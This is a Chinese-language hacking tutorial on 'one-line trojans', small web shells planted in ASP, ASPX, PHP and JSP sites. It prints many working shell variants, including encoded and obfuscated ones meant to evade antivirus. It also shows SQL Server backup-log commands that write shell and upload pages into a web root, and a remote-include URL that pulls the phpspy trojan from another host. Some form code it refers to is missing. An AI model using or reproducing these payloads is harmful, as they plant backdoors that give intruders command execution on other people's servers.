一句話木馬的工作原理：一句話木馬分析服務(wù)端與客戶端。

'一句話木馬'服務(wù)端（是用于本地的html提交腳本木馬文件）
就是我們要用來(lái)插入到asp文件中的asp語(yǔ)句，（不僅僅是以asp為后綴的數(shù)據(jù)庫(kù)文件），該語(yǔ)句將回為觸發(fā)，接收入侵者通過(guò)客戶端提交的數(shù)據(jù)，執(zhí)行并完成相應(yīng)的操作，服務(wù)端的代碼內(nèi)容為 <%execute request('value')%> 其中value可以自己修改

'一句話木馬'客戶端（遠(yuǎn)程服務(wù)器上被插入一句話的asp可執(zhí)行文件）
用來(lái)向服務(wù)端提交控制數(shù)據(jù)的，提交的數(shù)據(jù)通過(guò)服務(wù)端構(gòu)成完整的asp功能語(yǔ)句并執(zhí)行，也就是生成我們所需要的asp木馬文件

一句話木馬的適用環(huán)境：

1.服務(wù)器的來(lái)賓賬戶有寫(xiě)入權(quán)限
2.已知數(shù)據(jù)庫(kù)地址且數(shù)據(jù)庫(kù)格式為asa或asp
3.在數(shù)據(jù)庫(kù)格式不為asp或asa的情況下，如果能將一句話插入到asp文件中也可

現(xiàn)在先假設(shè)在遠(yuǎn)程主機(jī)的TEXT.ASP(客戶端）中已經(jīng)有了<%execute request('value')%>這個(gè)語(yǔ)句.)在ASP里<%execute ............')%>意思是執(zhí)行省略號(hào)里的語(yǔ)句.那么如果我寫(xiě)進(jìn)我們精心構(gòu)造的語(yǔ)句,它也是會(huì)幫我們執(zhí)行的.就按照這上面的思路,我們就可以在本地構(gòu)造一個(gè)表單內(nèi)容如下:(//為注釋)

表單的作用就是把我們表單里的內(nèi)容提交到遠(yuǎn)程主機(jī)的TEXT.ASP這個(gè)文件.然后因?yàn)門(mén)EXT.ASP里有<%execute request('value')%>這句,那么這句代碼就會(huì)執(zhí)行我們從表單里傳來(lái)的內(nèi)容哦.(表單名必須和<%execute request('value')%>里的VALUE一樣,就是我用藍(lán)色標(biāo)記的那兩處,必須相等)

說(shuō)到這里大家是不是清楚了.我們構(gòu)造了兩個(gè)表單,第一個(gè)表單里的代碼是文件操作的代碼(就是把第二個(gè)表單內(nèi)的內(nèi)容寫(xiě)入在當(dāng)前目錄下并命名為newvalue.ASP的這么一段操作的處理代碼)那么第二個(gè)表單當(dāng)然就是我們要寫(xiě)入的馬了.

具體的就是下面這一段:

這樣的話第二個(gè)表單的名字必須和lP.writetext request('newvalue') 里的Newvalue一樣,就是我用紅色標(biāo)注的那兩處.
至此只要服務(wù)器有寫(xiě)的權(quán)限你表單所提交的大馬內(nèi)容就會(huì)被寫(xiě)入到newmm.asp中。即newmm.asp為我們的shell地址。

關(guān)于服務(wù)器錯(cuò)誤：

經(jīng)常,當(dāng)我們?cè)谝粋€(gè)asp文件內(nèi)添加了一句話后,就會(huì)出現(xiàn)類型不匹配的錯(cuò)誤:
 

這個(gè)如何解決呢?
想出了一個(gè)好辦法,只要用'eval'替換掉'execute'服務(wù)端,就不會(huì)出錯(cuò)了!
用一句話客戶端連接，加入容錯(cuò)語(yǔ)句，你可以把它插入到任何ASP文件而不會(huì)像以前一樣出錯(cuò)。
<%On Error Resume Next execute request('value')%>

常見(jiàn)asp一句話木馬的變體：

<%ExecuteGlobal request(chr(35))%>

<%ExecuteGlobal request(chr(35))%>

<%execute request('#')%>

<%execute request(chr(35))%>

<script language=VBScript runat=server>if request(chr(35))<>'''' then
ExecuteGlobal request(chr(35))
</script>

<%ExecuteGlobal request(chr(35))%> 9月30日

<%eval request('#')%>

數(shù)據(jù)庫(kù)里插入
┼攠數(shù)畣整爠煥敵瑳∨∣┩愾

utf-7的馬
<%@ codepage=65000%>
<% response.Charset='936'%>
<%e j-x j-e j-c j-u j-t j-e j-( j-r j-e j-q j-u j-e j-s j-t j-( j- ACI-# ACI) j-) j-%>

<%set ms = server.CreateObject('MSScriptControl.ScriptControl.1')
ms.Language='VBScript'
ms.AddObject 'Response', Response
ms.AddObject 'request', request
ms.AddObject 'session', session
ms.AddObject 'server', server
ms.AddObject 'application', application
ms.ExecuteStatement ('ex'&'ecute(request(chr(35)))')%>

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;! /D`14Dv&X#*@!@*ErPPD4 P2Xn^ED VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

各種環(huán)境下的一句話木馬：

aspx

1.相當(dāng)于ASP的一句話木馬:

程序代碼

alter database pubs set RECOVERY FULL--
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:/TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language='C#' validateRequest='false' %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath('images.aspx'),false);ow.Write(Request.Params['l']);ow.Close()%> ')
backup log pubs to disk = 'd:/test11.aspx'
//這個(gè)和asp的一樣，客戶端post一個(gè)變量l 把木馬代碼丟在變量l里面就ok了 這個(gè)是類似asp的一句話木馬。
//mu.aspx.htm 客戶端:(提交后訪問(wèn):http://IP/images.aspx)
 

2、下面這個(gè)是我找網(wǎng)上的asp.net的上傳文件程序，修改精簡(jiǎn)了下，也可以用：

程序代碼

drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:/TM' with init
insert into pubs.dbo.cmd(a) values ('<script language='c#' runat='server'>private void bc(object o,EventArgs e) {string u='files';string filename;int pos=f.PostedFile.FileName.LastIndexOf('//');filename=f.PostedFile.FileName.Substring(pos 1);f.PostedFile.SaveAs(Server.MapPath(u) '//' filename);}</script><form method='post' runat='server'><input type='file' id='f' runat='server'/><input type='submit' value='ss' runat='Server' /></form>')
backup log pubs to disk = 'c:/inetpub/wwwroot/test11.aspx'

PHP

本文沒(méi)有什么特別之處，僅求拋磚引玉。并送給和我一樣菜的在PHP門(mén)邊徘徊的朋友。
剛學(xué)PHP沒(méi)幾天，我就急于功成，所以有錯(cuò)誤及不足之處請(qǐng)大家積極指出。
PHP語(yǔ)法的強(qiáng)大是ASP望塵莫及的，僅一個(gè):<? phpinfo();?>就可以刺探整個(gè)服務(wù)器的配置。運(yùn)行cmd，上傳文件等，都是非常簡(jiǎn)便的，現(xiàn)在用的好的PHP木馬，莫過(guò)于angel的phpspy了。昨天hak_ban問(wèn)怎么給PHP木馬加密，我還沒(méi)想到，但是對(duì)于寫(xiě)一個(gè)微型PHP木馬，我想還是很難被殺的。
這里簡(jiǎn)單探討一下幾個(gè)函數(shù)可以作為木馬的使用：

1． 可以運(yùn)行外部命令的幾個(gè)函數(shù)：system,passthru,exec,shell_exec,popen。
例：只要將<?system($cmd);?>等保存為cmd.php及可實(shí)現(xiàn)運(yùn)行外部命令的功能。這幾個(gè)函數(shù)可以說(shuō)是最早的微行php木馬了，所以一般虛擬主機(jī)的設(shè)置也會(huì)將這些函數(shù)屏蔽的。

2．還記得WDB論壇的style.php的漏洞嗎？我們可以利用這個(gè)做個(gè)很難被殺的小木馬。如下：
 

將其保存為1.php ，我們就可以調(diào)用其他不支持php服務(wù)器里的.php木馬（如phpspy.php）來(lái)達(dá)到我們的目的：http:///1.php? Include=http://www./phpspy.php
這里http://www.是不支持php的，否則將會(huì)在http://www.這臺(tái)服務(wù)器運(yùn)行phpspy.php,而不是目標(biāo)服務(wù)器。

3． 這個(gè)還是angel在Discuz 2.2F的攻擊中給我們的一個(gè)非常好的上傳木馬，我沒(méi)有改：
 

將其保存為up.php后，在本地提交表單：
 

就可以把大個(gè)的php木馬上傳上去。

4． 我一直在想有沒(méi)有同冰狐浪子的那個(gè)ASP一句話木馬一樣通過(guò)本地表單提交運(yùn)行的PHP木馬。終于找到了函數(shù)：eval，在PHP4中文參考手冊(cè)上它的語(yǔ)法說(shuō)明：
語(yǔ)法: void eval(string code_str);
內(nèi)容說(shuō)明：本函數(shù)可將字符串之中的變量值代入，通常用在處理數(shù)據(jù)庫(kù)的資料上。參數(shù) code_str 為欲處理的字符串。值的 注意的是待處理的字符串要符合 PHP 的字符串格式，同時(shí)在結(jié)尾處要有分號(hào)。使用本函數(shù)處理后的字符串會(huì)沿續(xù)到 PHP 程序結(jié)束。

我們可以在目標(biāo)主機(jī)上保存:<?eval($cmd);?>為一個(gè)PHP文件（我想也可以插在PHP任意文件里）。然后通過(guò)本地提交來(lái)達(dá)到目的，但與ASP不同的是，在magic_quotes_gpc = on的時(shí)候，過(guò)濾的很多的字符，使得這個(gè)使用功能大大的縮小。

對(duì)于這個(gè)PHP木馬本地表單我做了很多次，還沒(méi)有成熟的代碼。還請(qǐng)高手指教。寫(xiě)好后會(huì)奉獻(xiàn)給大家的。但是eval這個(gè)函數(shù)可以做微型PHP木馬是無(wú)須質(zhì)疑的。
Ps:寫(xiě)完后，有人告訴我，其實(shí)高手早就有微型的PHP木馬了，只是沒(méi)有公開(kāi)。哎，我好郁悶啊，研究的都是人家早就有了的成果。不管怎么樣，和大家分享一下我的研究，希望能得到幫助和指教。

JSP

這個(gè) 后門(mén)估計(jì)不用我說(shuō)了吧.還是提示一下咯.保存為1.jsp 提交url!

http://localhost/1.jsp?f=1.txt&t=hello

然后:http://localhost/1.txt 就出來(lái)了 內(nèi)容為 hello .....